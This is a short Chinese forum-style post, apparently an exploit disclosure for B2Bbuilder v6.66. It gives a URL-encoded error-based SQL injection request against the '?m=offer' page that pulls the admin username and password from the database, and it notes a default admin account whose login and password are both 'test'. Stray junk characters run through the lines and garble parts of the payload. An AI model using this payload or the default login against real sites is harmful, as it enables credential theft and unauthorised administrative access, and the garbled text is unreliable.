测试的程序版本为:B2Bbuilder_v6.66 q8 [6 r8 R# o! V
0 J1 H P: j* X8 t+ c8 [
7 i9 y8 g7 U c, M7 U8 v, L" g
http://www.site.com/?m=offer& ... m%28select+count%28*%29%2Cconcat%28%28
# C/ N' g" F0 h8 p: hselect+%28select+%28select+concat%280x27%2C0x7e%2Cb2bbuilder_admin.user,0x27,password9 h/ r! R c$ R5 n" y U5 m
%2C0x27%2C0x7e%29+from+%60b2bbuilder%60.b2bbuilder_admin+Order+by+user+limit+0%2C1" T3 k; S `" @0 C" ^$ C. b( d& e
%29+%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29 O- m' l0 j+ a9 h
*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1: v; w6 Q+ F" n3 g, H
) @4 v, a8 p0 `% q5 W1 i# ?这个B2B程序还有一个默认的管理员帐号,帐号密码都是test+ H, ]0 l# k. W
& i( G% A! g& I/ \ |